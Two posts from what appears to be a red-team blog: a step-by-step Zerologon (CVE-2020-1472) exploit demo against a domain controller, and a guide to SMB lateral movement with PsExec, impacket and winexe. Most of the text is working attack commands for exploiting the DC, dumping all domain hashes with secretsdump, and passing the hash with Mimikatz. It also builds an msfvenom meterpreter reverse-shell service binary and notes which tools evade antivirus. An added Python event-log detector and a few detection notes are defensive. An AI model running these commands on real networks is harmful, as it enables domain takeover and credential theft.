<p>nv2lt - Scratching the Surface: scratching the surface on cyber security and system administration. Feed https://nv2lt.github.io/atom.xml, generated 2021-05-11.</p>
<p>CVE-2020-1472, Exploit Demo (nv2lt, 2020-09-17): https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure</p>
<h1 id="preamble">Preamble</h1>
<p>In September 2020, the <a href="https://www.secura.com/pathtoimg.php?id=2055">whitepaper</a> for the CVE-2020-1472 vulnerability and the <a href="https://github.com/SecuraBV/CVE-2020-1472">Zerologon testing script</a> were released.<br />
This post is a step-by-step procedure for using a specific exploit released by dirkjanm on <a href="https://github.com/dirkjanm/CVE-2020-1472">GitHub</a> and for restoring the changes it makes, in order to avoid problems with the Domain Controller’s functionality after the exploit has run.</p>
<h1 id="exploit-usage">Exploit Usage</h1>
<ul>
<li>For this demo the Domain Controller NetBios name is <code class="language-plaintext highlighter-rouge">DC01</code>, its IP is <code class="language-plaintext highlighter-rouge">172.16.40.5</code> and the domain is <code class="language-plaintext highlighter-rouge">worklab.local</code>.</li>
<li>Impacket version 0.9.22 is already installed. Run the exploit against the DC:
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python cve-2020-1472-exploit.py dc01 172.16.40.5
</code></pre></div> </div>
</li>
</ul>
<p><img src="/assets/exploit-success.png" alt="exploit-success" /></p>
<ul>
<li>Use Impacket’s secretsdump to dump the credentials stored in NTDS
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py <span class="nt">-just-dc</span> <span class="nt">-no-pass</span> worklab/DC01<span class="se">\$</span>@172.16.40.5
<span class="c"># Since hash :31d6cfe0d16ae931b73c59d7e0c089c0 is the default empty password we can also use the command</span>
secretsdump.py worklab/DC01<span class="se">\$</span>@172.16.40.5 <span class="nt">-hashes</span> :31d6cfe0d16ae931b73c59d7e0c089c0
</code></pre></div> </div>
<p><img src="/assets/creds_dumped.png" alt="creds-dumped" /></p>
</li>
<li>As we can see, we now have the hashes of all users (including the domain admin) and the krbtgt hash, while the hash of <code class="language-plaintext highlighter-rouge">DC01$</code> is the empty-password hash (<code class="language-plaintext highlighter-rouge">:31d6cf0.....</code>).</li>
</ul>
<h1 id="restoring-dc-password">Restoring DC password</h1>
<ul>
<li>As mentioned in the <a href="https://www.secura.com/pathtoimg.php?id=2055">whitepaper</a>, this exploit changes the DC’s machine account password stored in AD (ntds) but not the one stored locally in SAM and in <code class="language-plaintext highlighter-rouge">HKLM\SECURITY\Policy\Secrets\$machine.ACC</code>. The mismatch causes the DC to misbehave in various unpredictable ways.</li>
<li>So, after getting the hashes above, it is advisable to restore the password of the DC.</li>
<li>We can recover the original machine password from the DC’s local hives (SAM/SECURITY). Two methods are demonstrated here.</li>
</ul>
<h2 id="first-method">First Method</h2>
<ul>
<li>Download the SYSTEM, SAM and SECURITY hives from the DC by getting a shell with the administrator hashes we got earlier
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:217.... worklab/user1@172.16.40.5
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
</code></pre></div> </div>
<p><img src="/assets/getting_sam.png" alt="getting_sam" /></p>
</li>
<li>
<p><strong>Be aware of the opsec considerations when using impacket wmiexec</strong></p>
</li>
<li>Extract the machine account password locally from the downloaded hives
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
</code></pre></div> </div>
<p><img src="/assets/machine-pass.png" alt="machine-pass" /></p>
</li>
<li>Restore password in ntds
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python restorepassword.py worklab.local/dc01@dc01 -target-ip 172.16.40.5 -hexpass 88b5869b8daad1f8a5177aa1d96c120e9da01e....
</code></pre></div> </div>
<p><img src="/assets/restore-pass.png" alt="restore-pass" /></p>
</li>
<li>Check that the restore was successful
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># This should give us an error since the DC01 password is not empty now
secretsdump.py -just-dc -no-pass worklab/DC01\$@172.16.40.5
</code></pre></div> </div>
<p><img src="/assets/check-restore.png" alt="check-restore" /></p>
</li>
</ul>
<h2 id="second-method---impacket-version-0921">Second Method - Impacket Version 0.9.21</h2>
<ul>
<li>With the latest Impacket version we can use secretsdump with the domain admin hash we got previously to retrieve the locally stored password of the DC directly
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py worklab/user1@dc01 <span class="nt">-target-ip</span> 172.16.40.5 <span class="nt">-hashes</span> aad3b435b51404eeaad3b435b51404ee:217e....
</code></pre></div> </div>
<p><img src="/assets/getting_sam-secretsdump.png" alt="getting_sam-secretsdump" /></p>
</li>
<li>
<p><strong>Note that to do so it starts the RemoteRegistry service, which is something Blue teams can spot.</strong></p>
</li>
<li>After that we continue as in First Method.</li>
</ul>
<hr />
<p>Windows Lateral Movement with smb, psexec and alternatives (nv2lt, 2020-09-08): https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to</p>
<h1 id="scope">Scope</h1>
<p>During a red team engagement there are several choices for lateral movement, whether you have credentials or hashes. Each choice has different configuration requirements in order to work, and each leaves different fingerprints on the remote machine.<br />
This post summarizes some of these SMB-based lateral movement techniques and checks the differences between them.<br />
In a later post I’ll try to summarize more lateral movement techniques like WinRM, WMI, PSRemote, RDP Hijacking and their alternatives with C# tools.</p>
<h1 id="smb-psexecsmbexecwinexe">SMB-(PsExec,Smbexec,winexe)</h1>
<h2 id="preamble">Preamble</h2>
<ul>
<li>In general, we execute remote commands (like powershell, vssadmin) over SMB using named pipes.</li>
<li>These tools leave behind a service binary and they are logged as a <code class="language-plaintext highlighter-rouge">Windows Event #5145</code>.</li>
<li>In short, the key facts are:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORTS Used: TCP 445(SMB), 135(RPC)
AUTH: Local Administrator Access
Tools: winexe, psexec (sysinternals, impacket), smbexec,...
Signatures: Service binaries left behind, Windows Event #5145
</code></pre></div> </div>
</li>
<li>All techniques that use SMB/RPC protocols for lateral movement need to have <strong>admin shares enabled</strong>. This is enabled by default in a windows domain environment but in order to test them on a non-domain machine we need to enable the Default Admin Shares (<code class="language-plaintext highlighter-rouge">C$, ADMIN$</code>). This includes the following:
<ul>
<li>Enable Administrator account and set a password</li>
<li>Open the relevant ports on the Windows Firewall. For a complete how-to see <a href="https://www.repairwin.com/enable-admin-shares-windows-10-8-7">Enable Default Admin Shares</a>, but <strong>in brief</strong>:
<ul>
<li>The easiest way is to enable File and Printer Sharing checkbox on the menu <code class="language-plaintext highlighter-rouge">Allow an app through Windows Firewall</code> from within <code class="language-plaintext highlighter-rouge">System and Security Settings</code><br />
From cmd:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=yes
</code></pre></div> </div>
</li>
<li>In case the attacker machine is in a different subnet from the target machine, the scope of the above setting should be changed: in the advanced firewall settings the scope of <code class="language-plaintext highlighter-rouge">File and Printer Sharing (NB-Session-In)</code> and <code class="language-plaintext highlighter-rouge">File and Printer Sharing (SMB-In)</code> should be <code class="language-plaintext highlighter-rouge">any</code> instead of <code class="language-plaintext highlighter-rouge">local subnet</code>.</li>
</ul>
</li>
<li>Disable remote UAC token filtering by setting <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code> in the registry to <code class="language-plaintext highlighter-rouge">value=0x1</code>:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
</code></pre></div> </div>
<ul>
<li><strong>Note</strong> on <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code>
<ul>
<li>After Windows Vista, any remote connection (wmi, psexec, etc) with any non-RID 500 local admin account (local to the remote machine account), returns a token that is “filtered”, which means <code class="language-plaintext highlighter-rouge">medium integrity</code> even if the user is a local administrator to the remote machine.</li>
<li>So, when the user attempts to access privileged resource remotely (e.g. <code class="language-plaintext highlighter-rouge">ADMIN$</code>), he gets an <code class="language-plaintext highlighter-rouge">Access Denied</code> message, despite having administrative access to the remote machine as a local user.</li>
<li>In other words:
<blockquote>
<p>When a user who is a member of the local administrators group on the target remote computer establishes a remote administrative connection…they will not connect as a full administrator. The user has no elevation potential on the remote computer, and the user cannot perform administrative tasks. If the user wants to administer the workstation with a Security Account Manager (SAM) account, the user must interactively log on to the computer that is to be administered with Remote Assistance or Remote Desktop.</p>
</blockquote>
</li>
<li>This behaviour depends on <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code>. By disabling the filtering, a user who is a member of the local administrators group on the target remote computer will get a <code class="language-plaintext highlighter-rouge">high integrity</code> access token, so psexec, wmi etc. will work.</li>
<li>The above <strong>does not</strong> apply to the default local administrator account (RID 500). This account is not affected by <code class="language-plaintext highlighter-rouge">LocalAccountTokenFilterPolicy</code>, so it always gets a high integrity token. By default this account is disabled in Windows, but in some corporate environments it might be enabled.</li>
<li>On the other hand:
<blockquote>
<p>When a user with a domain user account logs on to a Windows Vista computer remotely, and the user is a member of the Administrators group, the domain user will run with a full administrator access token on the remote computer and UAC is disabled for the user on the remote computer for that session.</p>
</blockquote>
</li>
<li>The above explains why in a domain environment a domain user that has local administrative privileges on a remote machine can use psexec for lateral movement (has high integrity token on remote connection)</li>
<li>For more details: <a href="https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167">posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Having enabled the default admin shares on a single machine, we can proceed to check the various techniques as follows:</li>
</ul>
<hr />
<h2 id="sysinternals-psexec">Sysinternals PsExec</h2>
<ul>
<li>PsExec is part of the <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite">Sysinternals Suite</a></li>
<li>The way it works is as follows:
<ul>
<li>Connects to the <code class="language-plaintext highlighter-rouge">ADMIN$=C:\Windows</code> share and uploads a <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> file.</li>
<li>Then uses Service Control Manager (sc) to start the service binary (service name <code class="language-plaintext highlighter-rouge">PsExecSVC</code>)</li>
<li>
<p>Creates a named pipe on the destination host and uses it for input/output operations.</p>
<p><img src="/assets/psexec-netflow.png" alt="psexec-netflow" /></p>
</li>
<li>
<p>Executes the program as a child process of PSEXESVC.exe, whose own parent process is <code class="language-plaintext highlighter-rouge">services.exe</code></p>
<p><img src="/assets/2020-07-20-psexecsvc.png" alt="psexecsvc-image" /></p>
</li>
<li>Upon completion of its task, the PsExecSVC Windows service will be stopped and the <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> file will be deleted from <code class="language-plaintext highlighter-rouge">ADMIN$</code>.</li>
</ul>
</li>
</ul>
<h3 id="usage-examples">Usage Examples:</h3>
<ul>
<li>Semi interactive shell with admin credentials:
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">psexec.exe</span><span class="w"> </span><span class="nx">/accepteula</span><span class="w"> </span><span class="nx">\\192.168.1.2</span><span class="w"> </span><span class="nt">-u</span><span class="w"> </span><span class="nx">LAB\admin</span><span class="w"> </span><span class="nt">-p</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">cmd.exe</span>
</code></pre></div> </div>
</li>
<li>Semi interactive shell with NTLM hashes.<br />
By default, <strong>PsExec does not pass the hash</strong> by itself.<br />
However we can use Windows Credential Editor or <strong>Mimikatz</strong> for pass-the-hash and then utilize psexec.
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Get ntlm hashes with mimikatz</span><span class="w">
</span><span class="n">privilege::logonpasswords</span><span class="w">
</span><span class="c"># Spawn a new cmd as a different user using Mimikatz:</span><span class="w">
</span><span class="n">sekurlsa::pth</span><span class="w"> </span><span class="nx">/user:user1</span><span class="w"> </span><span class="nx">/domain:WORKGROUP</span><span class="w"> </span><span class="nx">/ntlm:217e50203a5aba59cefa863c724bf61b</span><span class="w">
</span><span class="c"># Psexec</span><span class="w">
</span><span class="n">PsExec.exe</span><span class="w"> </span><span class="nx">/accepteula</span><span class="w"> </span><span class="nx">\\192.168.1.2</span><span class="w"> </span><span class="nx">cmd.exe</span><span class="w">
</span></code></pre></div> </div>
</li>
</ul>
<h3 id="detection-on-target-machine">Detection on Target Machine</h3>
<ul>
<li>Since <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> is uploaded to the target’s network share (<code class="language-plaintext highlighter-rouge">ADMIN$</code>), a Windows event log id <code class="language-plaintext highlighter-rouge">5145</code> (network share object was checked for access) will be logged.</li>
<li>Event id <code class="language-plaintext highlighter-rouge">7045</code> for the initial service installation will also be logged.</li>
<li>Furthermore, the existence of the file <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> is an indication that PsExec has been used to access the target machine.</li>
</ul>
<h3 id="detection-on-source-host">Detection on Source host</h3>
<ul>
<li>A registry value is created when PsExec License Agreement has been agreed to.</li>
<li>Execution history (prefetch)</li>
</ul>
<hr />
<h2 id="impacket-psexecpy">Impacket PsExec.py</h2>
<ul>
<li><a href="https://github.com/SecureAuthCorp/impacket">Impacket Collection</a> is a well-known collection of Python classes for working with network protocols.</li>
<li>Impacket psexec.py works similarly to Sysinternals PsExec.</li>
<li>Needs admin rights on target machine</li>
<li>Port used: 445</li>
<li>Instead of uploading the PSEXESVC service binary, it uploads to <code class="language-plaintext highlighter-rouge">ADMIN$</code> a service binary with an arbitrary name. It may be flagged and stopped by AV/EDR.</li>
<li>Interactive binaries like (powershell, vssadmin, plink…) will cause the service to fail
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#Using credentials</span>
psexec.py user1:<span class="s2">"password"</span>@172.16.50.42 cmd.exe
<span class="c">#Using hashes</span>
psexec.py <span class="nt">-hashes</span> :217e50203a5aba59cefa863c724bf61b user1@172.16.50.42 cmd.exe
</code></pre></div> </div>
</li>
</ul>
<h2 id="psexec-like-without-psexec-using-sc-like-psexec-but-in-a-manual-way">PsExec-like without psexec (Using SC like psexec but in a manual way)</h2>
<ul>
<li>Requirements:
<ul>
<li>Port 139,445 open on the remote machine (smb)</li>
<li>Password or NTLM hash</li>
<li>Write permissions on a network shared folder. Doesn’t matter which one.<br />
NOTE: <code class="language-plaintext highlighter-rouge">NTFS permissions != Share Permissions</code>. So, permission to write locally is not enough</li>
<li>Permissions to create services on the remote machine: <code class="language-plaintext highlighter-rouge">SC_MANAGER_CREATE_SERVICE</code>-(Access mask: 0x0002)</li>
<li>Ability to start the service created: <br />
<code class="language-plaintext highlighter-rouge">SERVICE_QUERY_STATUS (Access mask: 0x0004) + SERVICE_START (Access mask: 0x0010)</code></li>
</ul>
</li>
<li>The last 2 requirements above are granted to administrators, so an unprivileged user does not meet them.</li>
<li>
<p>For more details check <a href="https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec">Lateral Movement- A deep look into psexec</a></p>
</li>
<li>Example
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Create an exe as a service</span>
msfvenom <span class="nt">-p</span> windows/x64/meterpreter/reverse_http <span class="nv">LHOST</span><span class="o">=</span>172.16.50.48 <span class="nv">LPORT</span><span class="o">=</span>8080 <span class="nt">-f</span> exe-service <span class="nt">--platform</span> windows <span class="nt">-e</span> x64/xor_dynamic <span class="nt">-o</span> meter64_service.exe
<span class="c"># List Shares</span>
smbclient <span class="nt">-L</span> 172.16.50.42 <span class="nt">-U</span> user1
</code></pre></div> </div>
<p><img src="/assets/smbclient_list_shares.png" alt="List Shares" /></p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Upload the exe to windows machine</span>
smbclient <span class="se">\\\\</span>172.16.50.42<span class="se">\\</span>smbshare <span class="nt">-U</span> user1 <span class="nt">-c</span> <span class="s2">"put meter64_service.exe test.exe"</span>
<span class="c"># Using impacket services.py create service remotely</span>
services.py WORKGROUP/user1@172.16.50.42 create <span class="nt">-name</span> testing <span class="nt">-display</span> testing1 <span class="nt">-path</span> <span class="s2">"</span><span class="se">\\\\</span><span class="s2">172.16.50.42</span><span class="se">\\</span><span class="s2">smbshare</span><span class="se">\\</span><span class="s2">test.exe"</span>
</code></pre></div> </div>
<p><img src="/assets/impacket_create_service.png" alt="Create Service" /></p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Using impacket services.py start the service and get the meterpreter shell</span>
services.py WORKGROUP/user1@172.16.50.42 start <span class="nt">-name</span> testing
</code></pre></div> </div>
<p><img src="/assets/meter_session.png" alt="PoC" /></p>
</li>
</ul>
<hr />
<h2 id="impacket-smbexecpy">Impacket smbexec.py</h2>
<ul>
<li>Part of the <a href="https://github.com/SecureAuthCorp/impacket">Impacket Collection</a>. It does not upload a service binary to target.</li>
<li>By default it creates a service with the name “BTOBTO”. Of course the name can be changed in <code class="language-plaintext highlighter-rouge">smbexec.py</code> under the variable <code class="language-plaintext highlighter-rouge">SERVICE_NAME=...</code>, or can be given as a command line parameter to <code class="language-plaintext highlighter-rouge">smbexec.py</code>.</li>
<li>For every command given:
<ul>
<li>Transfers the command from the attacker’s machine to the target machine via SMB as a bat file in <code class="language-plaintext highlighter-rouge">%TEMP%/execute.bat</code></li>
<li>A new service named “BTOBTO” is created which does the following and then exits.</li>
<li>It echoes the command to be executed into a <code class="language-plaintext highlighter-rouge">bat</code> script, redirects stdout and stderr to a temp file, runs the bat script and then deletes it.</li>
<li>Makes a call to an existing binary that already lives on the endpoint to execute commands, cmd.exe</li>
<li>It is actually a pseudo shell (<strong>Non-interactive Shell</strong>)</li>
<li><img src="/assets/smbexec_service_creation.png" alt="smbexec.py service creation" /></li>
</ul>
</li>
<li>Keep in mind that it does not drop any binary on the host (stealthier than psexec.py).
<ul>
<li><code class="language-plaintext highlighter-rouge">%COMSPEC%</code> is an environmental variable. <code class="language-plaintext highlighter-rouge">ComSpec=C:\WINDOWS\system32\cmd.exe</code></li>
</ul>
</li>
<li>Info was extracted from:
<ul>
<li><a href="https://book.hacktricks.xyz/windows/ntlm/smbexec">book.hacktricks.xyz</a></li>
<li><a href="https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/">Varonis - Stealthy password hacking with smbexec</a></li>
</ul>
</li>
<li>
<h2 id="tested-on-systems-with-different-avs-enabled-without-being-blocked-where-impacket-psexecpy-was-blocked">Tested on systems with different AVs enabled without being blocked where <code class="language-plaintext highlighter-rouge">impacket psexec.py</code> was blocked.</h2>
</li>
</ul>
<h2 id="winexe-statically-compiled--kali-winexe">Winexe Statically Compiled / Kali Winexe</h2>
<ul>
<li>It is the equivalent of psexec for Linux</li>
<li>The version installed in Kali (<code class="language-plaintext highlighter-rouge">apt install winexe</code>) does not support SMB v2, so it fails to execute on current versions of Windows where SMB v1 is deprecated.</li>
<li>Instructions for building a winexe version that supports smb v2 can be found below:
<ul>
<li><a href="https://community.opmantek.com/display/OA/Auditing+Windows+machines+from+Linux+using+SMB2">https://community.opmantek.com/display/OA/Auditing+Windows+machines+from+Linux+using+SMB2</a></li>
<li><a href="http://dl-openaudit.opmantek.com/winexe-static">http://dl-openaudit.opmantek.com/winexe-static</a></li>
<li><a href="https://whiteoaksecurity.com/blog/2019/10/15/tales-from-the-red-team-building-winexe">https://whiteoaksecurity.com/blog/2019/10/15/tales-from-the-red-team-building-winexe</a></li>
<li><a href="https://bitbucket.org/reevertcode/reevert-winexe-waf/src/master/">https://bitbucket.org/reevertcode/reevert-winexe-waf/src/master/</a></li>
</ul>
</li>
<li>Connects to <code class="language-plaintext highlighter-rouge">ADMIN$=C:\Windows</code> share folder and uploads a <code class="language-plaintext highlighter-rouge">winexesvc.exe</code> file.
<ul>
<li>Then uses Service Control Manager (sc) to start the service binary (service name <code class="language-plaintext highlighter-rouge">winexesvc</code>)</li>
<li>Creates a named pipe on the destination host and uses it for input/output operations.</li>
<li>It does not stop the service on exit and it does not delete the file in <code class="language-plaintext highlighter-rouge">c:\windows</code></li>
</ul>
</li>
<li>
<h2 id="tested-on-different-avs-without-being-blocked">Tested on different AVs without being blocked.</h2>
</li>
</ul>
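<p>As an added example, not code from the post or from any of the tools it covers: the host-side signatures this post lists, collected into one piece of detection logic. It covers <code class="language-plaintext highlighter-rouge">PSEXESVC.exe</code> written to <code class="language-plaintext highlighter-rouge">ADMIN$</code> (event 5145) and the <code class="language-plaintext highlighter-rouge">PSEXESVC</code> service install (event 7045) for Sysinternals PsExec, an arbitrarily named service binary dropped in the Windows directory for impacket psexec.py, the <code class="language-plaintext highlighter-rouge">BTOBTO</code> service running <code class="language-plaintext highlighter-rouge">%COMSPEC%</code> and <code class="language-plaintext highlighter-rouge">execute.bat</code> for smbexec.py, <code class="language-plaintext highlighter-rouge">winexesvc</code> for winexe, and a service ImagePath on a UNC share for the manual sc/services.py technique. The flat <code class="language-plaintext highlighter-rouge">key=value;</code> record format and the event records themselves are constructed for the example; the field names (ShareName, RelativeTargetName, AccessMask for 5145; ServiceName, ImagePath for 7045) are those of the Windows events, and a 5145 AccessMask with bit 0x2 set is a write/add-file request.</p>

```python
import re

# Constructed sample events (not real logs): one "key=value;..." line per event,
# using the field names of Security event 5145 and System event 7045.
SAMPLE_EVENTS = [
    r"EventID=5145;ShareName=\\*\ADMIN$;RelativeTargetName=PSEXESVC.exe;AccessMask=0x2;IpAddress=172.16.50.48;SubjectUserName=user1",
    r"EventID=7045;ServiceName=PSEXESVC;ImagePath=%SystemRoot%\PSEXESVC.exe;AccountName=LocalSystem",
    r"EventID=5145;ShareName=\\*\ADMIN$;RelativeTargetName=kQzRtYwB.exe;AccessMask=0x2;IpAddress=172.16.50.48;SubjectUserName=user1",
    r"EventID=7045;ServiceName=kQzRtYwB;ImagePath=%SystemRoot%\kQzRtYwB.exe;AccountName=LocalSystem",
    r"EventID=7045;ServiceName=BTOBTO;ImagePath=%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat;AccountName=LocalSystem",
    r"EventID=7045;ServiceName=winexesvc;ImagePath=winexesvc.exe;AccountName=LocalSystem",
    r"EventID=7045;ServiceName=testing;ImagePath=\\172.16.50.42\smbshare\test.exe;AccountName=LocalSystem",
    r"EventID=7045;ServiceName=Spooler;ImagePath=C:\Windows\System32\spoolsv.exe;AccountName=LocalSystem",
    r"EventID=5145;ShareName=\\*\C$;RelativeTargetName=Users\user1\Desktop\notes.txt;AccessMask=0x1;IpAddress=172.16.50.48;SubjectUserName=user1",
]

# An executable sitting directly in the Windows directory, i.e. the root of ADMIN$
WINDOWS_ROOT_EXE = re.compile(r"^(?:%systemroot%|%windir%|c:\\windows)\\[^\\]+\.exe$", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Turn a constructed 'key=value;key=value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(ev: dict):
    """Map one event to the lateral-movement signature it matches, or None."""
    if ev.get("EventID") == "5145":
        share = ev.get("ShareName", "").upper()
        target = ev.get("RelativeTargetName", "")
        mask = int(ev.get("AccessMask", "0"), 16)  # bit 0x2 = write data / add file
        if share.endswith("ADMIN$") and target.lower().endswith(".exe") and mask & 0x2:
            if target.lower() == "psexesvc.exe":
                return "Sysinternals PsExec: PSEXESVC.exe written to ADMIN$"
            return "PsExec-style service binary written to ADMIN$ (impacket psexec.py uses an arbitrary name)"
        return None
    if ev.get("EventID") == "7045":
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        if name.upper() == "PSEXESVC":
            return "Sysinternals PsExec: service PSEXESVC installed"
        if name == "BTOBTO" or ("%COMSPEC%" in path.upper() and "execute.bat" in path.lower()):
            return "impacket smbexec.py: %COMSPEC% service running execute.bat"
        if name.lower() == "winexesvc":
            return "winexe: service winexesvc installed"
        if path.startswith("\\\\"):
            return "Service binary loaded from a UNC share (manual sc/services.py technique)"
        if WINDOWS_ROOT_EXE.match(path):
            return "Service binary dropped in the Windows directory (ADMIN$) under an arbitrary name"
    return None


def scan(lines):
    """Return (EventID, subject, verdict) for every event that matches a signature."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict:
            hits.append((ev["EventID"], ev.get("ServiceName") or ev.get("RelativeTargetName", ""), verdict))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

<p>The two benign records (the Spooler service and a document read on <code class="language-plaintext highlighter-rouge">C$</code>) produce no hit, which is the point of keying on the share name, the write bit and the service image path rather than on event ids alone; in a real deployment the same rules run over the parsed EventData of the Security and System logs instead of the constructed lines.</p>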
<h2 id="metasploit-psexec">Metasploit PsExec</h2>
<ul>
<li>Same behaviour to sysinternals but when sc starts the service, it starts a new rundll32.exe process, allocates executable memory in the process and copies shellcode into it.
<ul>
<li><a href="https://blog.rapid7.com/2013/03/09/psexec-demystified/">https://blog.rapid7.com/2013/03/09/psexec-demystified/</a></li>
</ul>
</li>
<li>Modules in metasploit:
<pre>
exploit/windows/smb/psexec
exploit/windows/local/current_user_psexec
auxiliary/admin/smb/psexec_command
auxiliary/scanner/smb/psexec_loggedin_users
</pre>
</li>
<li>Service binaries for Metasploit PsExec are flagged by AV</li>
</ul>
<hr />
<h2 id="psexec-alternatives">PsExec Alternatives</h2>
<ul>
<li>CSExec - A C Sharp psexec implementation
<ul>
<li><a href="https://github.com/malcomvetter/CSExec">https://github.com/malcomvetter/CSExec</a></li>
</ul>
</li>
<li>PAExec
<ul>
<li><a href="https://www.poweradmin.com/paexec/">https://www.poweradmin.com/paexec/</a></li>
<li><a href="https://github.com/poweradminllc/PAExec">https://github.com/poweradminllc/PAExec</a></li>
</ul>
</li>
</ul>
<h1 id="references">References</h1>
<ul>
<li><a href="https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-4">https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-4</a></li>
<li><a href="https://adamtheautomator.com/psexec-ultimate-guide/">https://adamtheautomator.com/psexec-ultimate-guide/</a></li>
<li><a href="https://jpcertcc.github.io/ToolAnalysisResultSheet/">https://jpcertcc.github.io/ToolAnalysisResultSheet/</a></li>
<li><a href="https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec">https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec</a></li>
<li><a href="https://book.hacktricks.xyz/windows/ntlm/smbexec">https://book.hacktricks.xyz/windows/ntlm/smbexec</a></li>
<li><a href="https://redcanary.com/blog/threat-hunting-psexec-lateral-movement/">https://redcanary.com/blog/threat-hunting-psexec-lateral-movement/</a></li>
</ul>